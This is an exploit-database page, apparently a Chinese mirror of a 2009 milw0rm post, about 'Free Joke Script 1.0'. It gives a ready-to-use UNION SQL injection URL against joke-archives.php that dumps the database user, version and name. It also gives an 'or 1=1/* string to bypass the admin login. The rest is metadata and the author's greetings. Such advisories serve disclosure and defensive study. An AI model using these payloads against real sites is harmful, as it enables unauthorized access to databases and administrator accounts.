Free Joke Script 1.0 - Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057452 漏洞类型
发布时间 2009-02-12 更新时间 2009-02-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8047
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# freejokesscript = 1.0 (joke-archives.php) remote sql injection vulnerability & admin bypass vulnerability 

# info : found at semi sexy mode, when i was searching jokes script for my own site. if u have any please help :(. i didnt sit and search them like others so dont kick me hard :)

# author : MuhaciR aka гламурный подонок

# source : http://www.evernewscripts.com/?p=3

# license price : $20 per copy

# sql: http://www.victim.com/[jokes path if any]/joke-archives.php?cat_name=muhacir&cat_id=15+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*

# admin bypas: simply enter 'or 1=1/* at login. no filtration

# greetz goes : 

	-me
	
	-my love, ok a little to turkmen girlz too :)

	-friends: arassa_turkmen, bezzat, mc_merw, baamcik, dmry ;)

	-and ofcourse str0ke for running this site

P.S:i wholeheartedly celebrate your valentines day and wish you to love, be loved, success and ferrari

# milw0rm.com [2009-02-12]